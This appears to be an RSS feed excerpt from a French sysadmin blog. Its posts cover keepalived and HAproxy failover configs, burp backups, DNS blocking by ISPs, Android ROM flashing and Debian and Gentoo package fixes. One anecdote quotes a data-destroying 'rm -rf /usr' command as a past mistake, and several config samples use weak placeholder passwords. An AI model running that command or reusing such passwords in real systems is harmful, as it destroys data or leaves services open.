&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;keepalived configuration, /etc/keepalived/keepalived.conf&lt;/strong&gt;&lt;br&gt;
Le fichier de configuration est commenté avec les information de la manpage que je vous invite a lire.&lt;/p&gt;
&lt;p&gt;Sur le noeud maître:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;
# global definitions
global_defs {
}

# healthcheck of HAproxy
vrrp_script check_haproxy {
        script &amp;#34;killall -0 haproxy&amp;#34; # killall is faster
        interval 2 # in sec
        weight 2   #
}

# vrrp instance definition
vrrp_instance vrrp_01 {
        state MASTER
        interface eth0
        virtual_router_id 10 # used to differentiate multiple instances of vrrpd running on the same NI
        priority 150         # to be MASTER, make 50 more than other machines. priority 100
        use_vmac             # Use VRRP Virtual MAC - will create a vrrp.10 iface
        # authentication to access vrrpd
        authentication {
                auth_type PASS
                auth_pass testpass
        }
        # vip on wich HAproxy run
        virtual_ipaddress {
                192.168.122.10
                192.168.122.9
        }
        # healthcheck to use
        track_script {
                check_haproxy
        }
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Peu de différences pour la configuration du noeud esclave (slave state et priority):&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;
 definitions
global_defs {
}

# healthcheck of HAproxy
vrrp_script check_haproxy {
    script &amp;#34;killall -0 haproxy&amp;#34; # killall is faster
    interval 2 # in sec
    weight 2   #
}

# vrrp instance definition
vrrp_instance vrrp_01 {
    state SLAVE
    interface eth0
    virtual_router_id 10 # used to differentiate multiple instances of vrrpd running on the same NI
    priority 50          # to be MASTER, make 50 more than other machines. priority 100
    use_vmac             # Use VRRP Virtual MAC - will create a vrrp.10 iface
    # authentication to access vrrpd
    authentication {
        auth_type PASS
        auth_pass testpass
    }
    # vip on wich HAproxy run
    virtual_ipaddress {
        192.168.122.10
        192.168.122.9
    }
    # healthcheck to use
    track_script {
        check_haproxy
    }
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;HAproxy configuration&lt;/strong&gt;&lt;br&gt;
Utiliser la même configuration sur tous vos noeuds est chaudement recommandé ;-)&lt;/p&gt;
&lt;p&gt;Je vous laisse découvrir HAproxy si vous ne connaissez pas déjà ce formidable logiciel !&lt;br&gt;
Je décris ici une configuration simpliste pour tester notre configuration de keepalived:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;frontend f_vrrp10_svc
 bind 192.168.122.10:80
 default_backend b_webfarm
 
backend b_webfarm
 server srv1 192.168.122.21:80 check
 server srv2 192.168.122.22:80 check
 server srv3 192.168.122.23:80 check
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Ce post est inspiré par cet article.&lt;br&gt;
&lt;a href=&#34;http://dasunhegoda.com/how-to-setup-haproxy-with-keepalived/833/&#34;&gt;http://dasunhegoda.com/how-to-setup-haproxy-with-keepalived/833/&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>HAproxy 1.6 est sorti</title>
      <link>https://www.lamy.im/posts/haproxy-1-6-est-sorti/</link>
      <pubDate>Wed, 14 Oct 2015 15:39:47 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/haproxy-1-6-est-sorti/</guid>
      <description>HAproxy est sorti hier en version 1.6. 16 mois et 1156 commits après la version 1.5.
Au menu des nouveautés on trouve principalement la possibilité de scripter en LUA ou de lancer des scripts externes de health check pour obtenir un état de l’application via des requêtes plus complexes qu’auparavant.
Par ici pour une liste plus détaillée des nouveautés.</description>
      <content>&lt;p&gt;HAproxy est sorti hier en version 1.6. 16 mois et 1156 commits après la version 1.5.&lt;/p&gt;
&lt;p&gt;Au menu des nouveautés on trouve principalement la possibilité de scripter en LUA ou de lancer des scripts externes de health check pour obtenir un état de l’application via des requêtes plus complexes qu’auparavant.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;http://blog.haproxy.com/2015/10/14/whats-new-in-haproxy-1-6/&#34;&gt;Par ici pour une liste plus détaillée des nouveautés.&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>livecoding.tv le twitch de la programmation</title>
      <link>https://www.lamy.im/posts/livecoding-tv-le-twitch-de-la-programmation/</link>
      <pubDate>Sun, 20 Sep 2015 18:55:16 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/livecoding-tv-le-twitch-de-la-programmation/</guid>
      <description>Les joueurs connaissent déjà twitch qui permet de diffuser ses parties sur le net, il y a désormais la même chose pour les programmeurs.
Sur https://www.livecoding.tv/ les programmeurs peuvent diffuser des sessions de code et les commenter après avoir téléchargé ‘open broadcaster software’.
Malheureusement il n’est disponible que pour MAC et windows
Les spectateurs peuvent filtrer selon le type de programme et la difficulté.
Le logiciel n’est pas disponible pour linux et les streams sont en flash mais on peut saluer l’initiative.</description>
      <content>&lt;p&gt;Les joueurs connaissent déjà twitch qui permet de diffuser ses parties sur le net, il y a désormais la même chose pour les programmeurs.&lt;/p&gt;
&lt;p&gt;Sur &lt;a href=&#34;https://www.livecoding.tv&#34;&gt;https://www.livecoding.tv/&lt;/a&gt; les programmeurs peuvent diffuser des sessions de code et les commenter après avoir téléchargé ‘open broadcaster software’.&lt;br&gt;
Malheureusement il n’est disponible que pour MAC et windows&lt;/p&gt;
&lt;p&gt;Les spectateurs peuvent filtrer selon le type de programme et la difficulté.&lt;/p&gt;
&lt;p&gt;Le logiciel n’est pas disponible pour linux et les streams sont en flash mais on peut saluer l’initiative.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>burp : la sauvegarde simple qui juste marche</title>
      <link>https://www.lamy.im/posts/burp-la-sauvegarde-simple-qui-juste-marche/</link>
      <pubDate>Sat, 12 Sep 2015 22:53:22 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/burp-la-sauvegarde-simple-qui-juste-marche/</guid>
      <description>Cette fois, je vais parler sauvegarde avec le logiciel burp. Je vous laisse vous référer au site officiel pour en apprendre plus sur les raisons du démarrage de ce projet par Graham Keeling. Burp est basé sur librsync, ce qui lui permet d’être très efficace sur les sauvegardes différentielles.
Des points intéressants de ce logiciel sont que le client fonctionne sur linux/mac/windows, qu’il est très simple à mettre en place. Par exemple, le client et le serveur sont dans le même binaire, il y a très peu de dépendances etc.</description>
      <content>&lt;p&gt;Cette fois, je vais parler sauvegarde avec le logiciel &lt;strong&gt;burp&lt;/strong&gt;. Je vous laisse vous référer au &lt;a href=&#34;http://burp.grke.org&#34;&gt;site officiel&lt;/a&gt; pour en apprendre plus sur les raisons du démarrage de ce projet par Graham Keeling. Burp est basé sur librsync, ce qui lui permet d’être très efficace sur les sauvegardes différentielles.&lt;/p&gt;
&lt;p&gt;Des points intéressants de ce logiciel sont que le client fonctionne sur linux/mac/windows, qu’il est très simple à mettre en place. Par exemple, le client et le serveur sont dans le même binaire, il y a très peu de dépendances etc.&lt;/p&gt;
&lt;p&gt;Autre point important pour mon cas d’usage qui comprend des ordinateurs portables qui ne sont pas toujours présents sur le réseau: c’est le client qui vient demander au serveur s’il est temps pour lui de se sauvegarder.&lt;/p&gt;
&lt;p&gt;Concrètement, il s’agit d’un cron qui se lance régulierement pour interroger le serveur. Selon la politique de sauvegarde définie et la date de la dernière sauvegarde, le serveur autorise la sauvegarde ou non. Le script de calcul coté serveur est bien sur configurable et modifiable.&lt;/p&gt;
&lt;p&gt;Je vais rapidement dérouler l’installation et la sauvegarde du premier client sur Debian.&lt;/p&gt;
&lt;p&gt;Installation du server et du client :&lt;br&gt;
&lt;code&gt;apt install burp&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Sur le serveur, autoriser le démon à se lancer en mettant &lt;strong&gt;RUN=yes&lt;/strong&gt; dans &lt;strong&gt;/etc/default/burp&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;La configuration du serveur se fait dans &lt;strong&gt;/etc/burp/burp-server.conf&lt;/strong&gt;&lt;br&gt;
L’ajout d’un client se passe simplement, il faut une configuration sur le serveur et une sur le client avec un mot de passe commun.&lt;/p&gt;
&lt;p&gt;Exemple sur le serveur dans &lt;strong&gt;/etc/burp/clientconfdir/client_test&lt;/strong&gt;&lt;br&gt;
&lt;code&gt;password = passbkp&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Exemple sur le client dans &lt;strong&gt;/etc/burp/burp.conf&lt;/strong&gt;&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;mode = client 
port = 4971
server = 10.0.0.1
password = passbkp
cname = client_test
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Bien sur il ne faut pas oublier de modifier le reste du fichier pour limiter le débit si necessaire et ajuster les inclusions et exclusions.&lt;/p&gt;
&lt;p&gt;A la première communication, le serveur va verifier le mot de passe puis signer le certificat X509 généré par le client, cela servira à chiffrer les communications par la suite.&lt;/p&gt;
&lt;p&gt;un rapide &lt;code&gt;burp -a b&lt;/code&gt; pour lancer la premiere sauvegarde, puis l’ajout de &lt;code&gt;burp -a t&lt;/code&gt; en cron et c’est fini !&lt;/p&gt;
&lt;p&gt;Après la première sauvegarde, cela va assez vite car burp inventorie les metadonnées des fichiers à sauvegarder puis les compare aux métadonnées de la derniere sauvegarde du serveur.&lt;br&gt;
Cela lui permet de ne sauvegarder que les fichiers ajoutés et pour les fichiers modifiés, seuls les blocs modifiés sont transmis.&lt;/p&gt;
&lt;p&gt;Une interface de visualisation est disponible depuis le serveur :&lt;br&gt;
&lt;code&gt;burp -c /etc/burp/burp-server.conf -a s&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Ziirish à lancé un projet d’interface web de monitoring et de configuration pour burp. Ça se passe ici pour ceux qui veulent tester : &lt;a href=&#34;https://git.ziirish.me/ziirish/burp-ui&#34;&gt;https://git.ziirish.me/ziirish/burp-ui&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Au moment de tester les restaurations, c’est amusant de voir que les regex sont utilisées pour selectioner les fichiers ou repertoires à remonter. C’est vraiment pratique.&lt;/p&gt;
&lt;p&gt;Exemple pour restaurer un fichier depuis le backup numéro 1 dans le repertoire /tmp/&lt;br&gt;
&lt;code&gt;burp -a r -b 1 -r fichier$ -d /tmp/&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;C’est &lt;a href=&#34;https://en.wikipedia.org/wiki/KISS_principle&#34;&gt;KISS&lt;/a&gt; non ? 🙂&lt;/p&gt;
&lt;p&gt;En bonus voici les infos qu’on trouve pour résumer l’état d’un backup.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;--------------------------------------------------------------------------------&amp;lt;
Start time: 2015-09-11 19:27:01
End time: 2015-09-11 19:28:08
Time taken: 01:07
                         New   Changed Unchanged   Deleted     Total |  Scanned
                   ------------------------------------------------------------
            Files:        15        59         0         0        74 |    48610
        Meta data:         0         0         0         0         0 |        1
      Directories:         0         0         0         0         0 |     6002
       Soft links:         0         0         0         0         0 |       56
    Special files:         0         0         0         0         0 |        2
      Grand total:        15        59         0         0        74 |    54671
                   ------------------------------------------------------------

 Warnings: 1

 Bytes estimated: 213898414380 (199.21 GB)  
 Bytes in backup: 110569423 (105.45 MB)  
 Bytes received: 0  
 Bytes sent: 23859722 (22.75 MB)  
--------------------------------------------------------------------------------
&lt;/code&gt;&lt;/pre&gt;</content>
    </item>
    
    <item>
      <title>13 ans déjà</title>
      <link>https://www.lamy.im/posts/13-ans-deja/</link>
      <pubDate>Fri, 28 Aug 2015 16:50:00 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/13-ans-deja/</guid>
      <description>Il y a 13 ans, j’installais ma premiere distribution, et avec elle je m’essayais à la configuration de XFree86 et à la compilation de noyau pour avoir le bon driver de carte réseau :-)
C’était une slackware 8.2… en 2002, cela fait 13 ans déjà!
La découverte de swaret a changé ma vie grâce à la gestion des dépendances. À moi la simplifitude !
Ensuite mandrakelinux qui m’a servi de gateway pendant un moment grâce au driver speedtouch de Benoit Papillaud, puis debian sur des serveurs @home.</description>
      <content>&lt;p&gt;Il y a 13 ans, j’installais ma premiere distribution, et avec elle je m’essayais à la configuration de XFree86 et à la compilation de noyau pour avoir le bon driver de carte réseau :-)&lt;/p&gt;
&lt;p&gt;C’était une slackware 8.2… en 2002, cela fait 13 ans déjà!&lt;/p&gt;
&lt;p&gt;La découverte de swaret a changé ma vie grâce à la gestion des dépendances. À moi la simplifitude !&lt;br&gt;
Ensuite mandrakelinux qui m’a servi de gateway pendant un moment grâce au driver speedtouch de Benoit Papillaud, puis debian sur des serveurs @home. Une premiere grosse boulette, un « rm -rf /usr » en voulant « rm -rf usr ».. dans un chroot, raté !&lt;/p&gt;
&lt;p&gt;Heureusement, le vieux lecteur de DAT qui assurait la sauvegarde a également assuré la restauration !&lt;/p&gt;
&lt;p&gt;Puis s’en est suivie la découverte de gentoo et de son installation bien plus manuelle que les autres.&lt;br&gt;
C’est une distribution réellement modulaire et très didactique. Après des années en ~arch sur une gentoo 2004, retour sur debian et passage sur redhat en entreprise.&lt;/p&gt;
&lt;p&gt;D’ailleurs c’est amusant de voir le parcours de chacun, jeune et moins jeune.&lt;br&gt;
En particulier le parcours des moules de &lt;a href=&#34;http://linuxfr.org/sondages/en-quelle-annee-etes-vous-passe-e-a-gnu-linux-ou-autre-systeme-libre&#34;&gt;linuxfr.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Du coté des window manager, c’est encore moins éclectique. J&amp;rsquo;ai rapidement choisi fluxbox pour sa rapidité et sa simplicité et suis vite passé sous enlightenment DR17 que j’utilise toujours depuis.&lt;/p&gt;
&lt;p&gt;C’était mon moment nostalgie, j’en ai terminé merci 🙂&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Les DNS menteurs contre T411 et les autres</title>
      <link>https://www.lamy.im/posts/les-dns-menteurs-contre-t411-et-les-autres/</link>
      <pubDate>Sat, 08 Aug 2015 16:12:43 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/les-dns-menteurs-contre-t411-et-les-autres/</guid>
      <description>Depuis peu, le site www.t411.io est devenu indisponible aux internautes des principaux FAI.
Le principe de blocage est simple. Quand vous demandez l’adresse du site t411.io, le DNS de votre FAI préféré vous renvoie votre propre adresse au lieu de vous communiquer celle du site.
Cette méthode à déjà été utilisée pour bloquer thepiratebay et est également utilisée par free pour son blocage de publicité sur la freebox révolution.
Exemple de ce que nous renvoient en ce moment les DNS de free:</description>
      <content>&lt;p&gt;Depuis peu, le site &lt;a href=&#34;https://www.t411.io&#34;&gt;www.t411.io&lt;/a&gt; est devenu indisponible aux internautes des principaux FAI.&lt;/p&gt;
&lt;p&gt;Le principe de blocage est simple. Quand vous demandez l’adresse du site t411.io, le DNS de votre FAI préféré vous renvoie votre propre adresse au lieu de vous communiquer celle du site.&lt;/p&gt;
&lt;p&gt;Cette méthode à déjà été utilisée pour bloquer thepiratebay et est également utilisée par free pour son blocage de publicité sur la freebox révolution.&lt;/p&gt;
&lt;p&gt;Exemple de ce que nous renvoient en ce moment les DNS de free:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;jc@darkstar2:~# dig +short www.t411.io
127.0.0.1
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Alors qu’avec un DNS neutre ça donne plutot :&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;jc@darkstar2:~# dig +short www.t411.io
t411.io.
108.162.203.254
108.162.204.254
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Au delà de la légalité de ces sites, il se pose le problème de la neutralité du net.&lt;br&gt;
Un FAI peut utiliser des DNS menteurs pour n’importe quelle raison, pas forcément sur requète judiciaire. Vous accedez donc à un internet non neutre, biaisé par le FAI.&lt;/p&gt;
&lt;p&gt;Si vous ne voulez plus que free, orange, bouygues ou sfr décident de ce qu’il faut aller voir ou pas, il suffit d’utiliser des DNS ouverts et neutres, qu’il tournent chez vous ou opérés par d’autres.&lt;br&gt;
Et pas question d’utiliser les DNS de google bien connus de tout le monde mais qui se servent de vos requètes pour vous tracer encore un peu plus et collecter plus de données à l&amp;rsquo;échelle mondiale. Ils ont beau être ouverts, l’utilisation des données récoltée n’est pas neutre. Pas question non plus d’utiliser openDNS qui sont aussi des menteurs :-)&lt;/p&gt;
&lt;p&gt;L’association FDN (French Data Network) fait tourner des DNS garantis avec de la neutralité dedans.&lt;br&gt;
Voici l’adresse IPV4:&lt;br&gt;
&lt;code&gt;80.67.169.12&lt;/code&gt;&lt;br&gt;
et l’adresse IPV6:&lt;br&gt;
&lt;code&gt;2001:910:800::12&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;La meilleure solution reste toutefois de faire tourner son propre DNS. J’utilise powerdns-recursor depuis plusieurs années et j’en suis satisfait. PDNS est aussi utilisable en master.&lt;/p&gt;
&lt;p&gt;Un service de résolution DNS @home, ça peut etre un cas d’usage d’un raspberry pie par exemple.&lt;/p&gt;
&lt;p&gt;En bonus deux lectures intéressantes du prolix S.Bortzmeyer:&lt;br&gt;
&lt;a href=&#34;http://www.bortzmeyer.org/dns-menteur.html&#34;&gt; http://www.bortzmeyer.org/dns-menteur.html&lt;/a&gt;&lt;br&gt;
&lt;a href=&#34;http://www.bortzmeyer.org/opendns-non-merci.html&#34;&gt; http://www.bortzmeyer.org/opendns-non-merci.html&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Amazon EFS le NFS as a service</title>
      <link>https://www.lamy.im/posts/amazon-efs-le-nfs-as-a-service/</link>
      <pubDate>Thu, 09 Jul 2015 08:13:29 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/amazon-efs-le-nfs-as-a-service/</guid>
      <description>Un article intéressant publié il y a 8 jours sur elastic file system.
C’est un cas d’usage simple mais complet qui permet de présenter ce nouveau service.
Efs est un NFS as a service utilisable sur ec2 ce qui complète l’offre stockage fournie par s3 et permettant d&amp;rsquo;heberger des applications ne gérant pas le stockage objet.
http://blog.osones.com/on-a-teste-amazon-elastic-file-system-efs.html</description>
      <content>&lt;p&gt;Un article intéressant publié il y a 8 jours sur elastic file system.&lt;/p&gt;
&lt;p&gt;C’est un cas d’usage simple mais complet qui permet de présenter ce nouveau service.&lt;/p&gt;
&lt;p&gt;Efs est un NFS as a service utilisable sur ec2 ce qui complète l’offre stockage fournie par s3 et permettant d&amp;rsquo;heberger des applications ne gérant pas le stockage objet.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;http://blog.osones.com/on-a-teste-amazon-elastic-file-system-efs.html&#34;&gt;http://blog.osones.com/on-a-teste-amazon-elastic-file-system-efs.html&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Problème de touchscreen sur oneplus one</title>
      <link>https://www.lamy.im/posts/probleme-de-touchscreen-sur-oneplus-one/</link>
      <pubDate>Fri, 03 Jul 2015 23:19:48 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/probleme-de-touchscreen-sur-oneplus-one/</guid>
      <description>Mon one plus one était serieusement touché par le problème de touchscreen, constaté aussi avec l’appli ‘ScreenTouchTest’.
La goutte d&amp;rsquo;eau a été quand il passait des appels ou tapait des sms tout seul 🙂
Je m’étais dis que j’allais le laisser stock, juste rooté mais finalement j’ai du le mettre a jour en CM12 nightly pour régler le soucis.
C’est désormais de l’histoire ancienne.
CM 12 pour one plus one</description>
      <content>&lt;p&gt;Mon one plus one était serieusement touché par le problème de touchscreen, constaté aussi avec l’appli ‘ScreenTouchTest’.&lt;/p&gt;
&lt;p&gt;La goutte d&amp;rsquo;eau a été quand il passait des appels ou tapait des sms tout seul 🙂&lt;br&gt;
Je m’étais dis que j’allais le laisser stock, juste rooté mais finalement j’ai du le mettre a jour en CM12 nightly pour régler le soucis.&lt;/p&gt;
&lt;p&gt;C’est désormais de l’histoire ancienne.&lt;br&gt;
&lt;a href=&#34;https://download.cyanogenmod.org/?device=bacon&#34;&gt;CM 12 pour one plus one&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Android 4.4 kitkat update on nexus 4 error</title>
      <link>https://www.lamy.im/posts/android-4-4-kitkat-update-on-nexus-4-error/</link>
      <pubDate>Sat, 23 Nov 2013 11:43:19 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/android-4-4-kitkat-update-on-nexus-4-error/</guid>
      <description>Hier matin mon nexus 4 me propose la mise à jour vers android 4.4.
L’update se télécharge au bout de 3 essais, le téléphone redémarre et plante avant de finir la mise à jour.
J’ai du réinstaller manuellement la ROM en unlockant le bootloader (ce qui efface les données du téléphone). Dans mon cas ce n’est pas très gènant car mes fichiers sont envoyés sur mon instance owncloud via l’application téléchargée sur F-droid.</description>
      <content>&lt;p&gt;Hier matin mon nexus 4 me propose la mise à jour vers android 4.4.&lt;br&gt;
L’update se télécharge au bout de 3 essais, le téléphone redémarre et plante avant de finir la mise à jour.&lt;/p&gt;
&lt;p&gt;J’ai du réinstaller manuellement la ROM en unlockant le bootloader (ce qui efface les données du téléphone). Dans mon cas ce n’est pas très gènant car mes fichiers sont envoyés sur mon instance owncloud via l’application téléchargée sur F-droid.&lt;/p&gt;
&lt;h3 id=&#34;prérequis&#34;&gt;&lt;strong&gt;prérequis&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Pour debian Jessie, j’ai pris le dernier SDK en date : adt-bundle-linux-x86_64-20131030.zip&lt;/li&gt;
&lt;li&gt;La ROM pour Nexus 4 : occam-krt16s-factory-2006f418.tgz&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&#34;push-de-la-rom&#34;&gt;&lt;strong&gt;Push de la ROM&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Ajouter les binaires du SDK dans le PATH&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;export PATH=$PATH:/home/user/android/adt-bundle-linux-x86_64-20131030/sdk/platform-tools&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Installation de la ROM&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Pour ceux qui ne souhaitent pas effacer le contenu de leur téléphone, il faut éditer le fichier flash-all.sh et retirer l’option -w de la commande fastboot.&lt;/strong&gt;&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;root@darkstar:/home/user/android/occam-krt16s# ./flash-all.sh
sending &amp;#39;bootloader&amp;#39; (2203 KB)...
OKAY [ 0.072s]
writing &amp;#39;bootloader&amp;#39;...
OKAY [ 0.319s]
finished. total time: 0.391s
rebooting into bootloader...
OKAY [ 0.001s]
finished. total time: 0.001s
sending &amp;#39;radio&amp;#39; (45537 KB)...
OKAY [ 1.436s]
writing &amp;#39;radio&amp;#39;...
OKAY [ 2.594s]
finished. total time: 4.030s
rebooting into bootloader...
OKAY [ 0.001s]
finished. total time: 0.001s
archive does not contain &amp;#39;boot.sig&amp;#39;
archive does not contain &amp;#39;recovery.sig&amp;#39;
archive does not contain &amp;#39;system.sig&amp;#39;
--------------------------------------------
Bootloader Version...: MAKOZ30d
Baseband Version.....: M9615A-CEFWMAZM-2.0.1700.98
Serial Number........: XXXXXXXXXXXXX
--------------------------------------------
checking product...
OKAY [ 0.002s]
checking version-bootloader...
OKAY [ 0.002s]
checking version-baseband...
OKAY [ 0.002s]
sending &amp;#39;boot&amp;#39; (6360 KB)...
OKAY [ 0.204s]
writing &amp;#39;boot&amp;#39;...
OKAY [ 0.362s]
sending &amp;#39;recovery&amp;#39; (6908 KB)...
OKAY [ 0.240s]
writing &amp;#39;recovery&amp;#39;...
OKAY [ 0.407s]
erasing &amp;#39;system&amp;#39;...
OKAY [ 1.401s]
sending &amp;#39;system&amp;#39; (700496 KB)...
OKAY [ 22.050s]
writing &amp;#39;system&amp;#39;...
FAILED (status read failed (No such device))
finished. total time: 61.658s
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Malgré l’erreur, ça c’est bien passé et le téléphone a redémarré sur la nouvelle version d&amp;rsquo;Android.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>debian wheezy dpkg: error processing forked-daapd</title>
      <link>https://www.lamy.im/posts/debian-wheezy-dpkg-error-processing-forked-daapd/</link>
      <pubDate>Thu, 09 May 2013 17:40:48 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/debian-wheezy-dpkg-error-processing-forked-daapd/</guid>
      <description>Une machine sous debian testing fraichement passée en wheezy a quelques soucis de mise à jour à cause de forked-daapd.
Setting up forked-daapd (0.19gcd-dmo1) ... Starting RSP and DAAP media server: invoke-rc.d: initscript forked-daapd, action &amp;#34;start&amp;#34; failed. dpkg: error processing forked-daapd (--configure): subprocess installed post-installation script returned error exit status 1 Errors were encountered while processing: forked-daapd E: Sub-process /usr/bin/dpkg returned an error code (1) A package failed to install. Trying to recover: Setting up forked-daapd (0.</description>
      <content>&lt;p&gt;Une machine sous debian testing fraichement passée en wheezy a quelques soucis de mise à jour à cause de forked-daapd.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Setting up forked-daapd (0.19gcd-dmo1) ...
Starting RSP and DAAP media server: invoke-rc.d: initscript forked-daapd, action &amp;#34;start&amp;#34; failed.
dpkg: error processing forked-daapd (--configure):
subprocess installed post-installation script returned error exit status 1
Errors were encountered while processing:
forked-daapd
E: Sub-process /usr/bin/dpkg returned an error code (1)
A package failed to install.  Trying to recover:
Setting up forked-daapd (0.19gcd-dmo1) ...
Starting RSP and DAAP media server: invoke-rc.d: initscript forked-daapd, action &amp;#34;start&amp;#34; failed.
dpkg: error processing forked-daapd (--configure):
subprocess installed post-installation script returned error exit status 1
Errors were encountered while processing:
forked-daapd
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Il a suffit de killer le processus &lt;em&gt;/usr/sbin/forked-daapd&lt;/em&gt; et de relancer l’installation du paquet pour que tout soit OK.&lt;/p&gt;
&lt;p&gt;Pour une fois c’était presque trop simple.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Changement de serveur</title>
      <link>https://www.lamy.im/posts/changement-de-serveur/</link>
      <pubDate>Mon, 30 Jul 2012 23:41:06 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/changement-de-serveur/</guid>
      <description>Pour ceux qui utilisent les services mail/jabber/irc, je suis en train de procéder au changement du serveur.
Les principaux sites web ainsi que les comptes email ont été migrés, ce soir aura lieu le déménagement du serveur jabber. Il pourra y avoir des perturbations le temps de la mise à jour, soyez patients :-)
Le reste des services suivra durant la semaine.</description>
      <content>&lt;p&gt;Pour ceux qui utilisent les services mail/jabber/irc, je suis en train de procéder au changement du serveur.&lt;/p&gt;
&lt;p&gt;Les principaux sites web ainsi que les comptes email ont été migrés, ce soir aura lieu le déménagement du serveur jabber. Il pourra y avoir des perturbations le temps de la mise à jour, soyez patients :-)&lt;/p&gt;
&lt;p&gt;Le reste des services suivra durant la semaine.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Active version of CPython 3 is not supported by dev-python/dbus-python-1.1.1</title>
      <link>https://www.lamy.im/posts/active-version-of-cpython-3-is-not-supported-by-dev-pythondbus-python-1-1-1/</link>
      <pubDate>Wed, 25 Jul 2012 20:52:10 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/active-version-of-cpython-3-is-not-supported-by-dev-pythondbus-python-1-1-1/</guid>
      <description>Il y a quelques jours, je me suis fait agresser par ma gentoo a la mise à jour de dev-python/dbus-python:
&amp;gt;&amp;gt;&amp;gt; Emerging (1 of 1) dev-python/dbus-python-1.1.1 * dbus-python-1.1.1.tar.gz SHA256 SHA512 WHIRLPOOL size ;-) ... [ ok ] * ERROR: dev-python/dbus-python-1.1.1 failed (setup phase): * Active version of CPython 3 is not supported by dev-python/dbus-python-1.1.1 * Il suffit de :
eselect python update --python2 eselect python update --python3 pour utiliser la dernière version de python sur chaque branche.</description>
      <content>&lt;p&gt;Il y a quelques jours, je me suis fait agresser par ma gentoo a la mise à jour de dev-python/dbus-python:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; Emerging (1 of 1) dev-python/dbus-python-1.1.1
 * dbus-python-1.1.1.tar.gz SHA256 SHA512 WHIRLPOOL size ;-) ...                        [ ok ]
 * ERROR: dev-python/dbus-python-1.1.1 failed (setup phase):
 *   Active version of CPython 3 is not supported by dev-python/dbus-python-1.1.1
 *
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Il suffit de :&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;eselect python update --python2
eselect python update --python3 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;pour utiliser la dernière version de python sur chaque branche. Ensuite, on peut recompiler dev-python/dbus-python :-)&lt;/p&gt;
&lt;p&gt;Solution trouvée sur le &lt;a href=&#34;http://forums.gentoo.org/viewtopic-t-923884-start-0.html&#34;&gt;forum gentoo&lt;/a&gt;, toujours aussi actif.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>RHEL extension de LUN</title>
      <link>https://www.lamy.im/posts/rhel-extension-de-lun/</link>
      <pubDate>Thu, 22 Sep 2011 16:24:50 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/rhel-extension-de-lun/</guid>
      <description>On me dit que je suis mort et qu’il ne se passe rien ici, que nenni !
Pour la peine, je post ici un bloc note qui pourra servir à certains.. ou pas.
Ça peut être pratique de procéder a une extension de LUN si la baie de stockage le gère correctement. Par exemple, une VNX toute neuve fait cela très bien.
Coté systeme, il faut gerer le resize des disques pour chaque chemin et du device « multipathé ».</description>
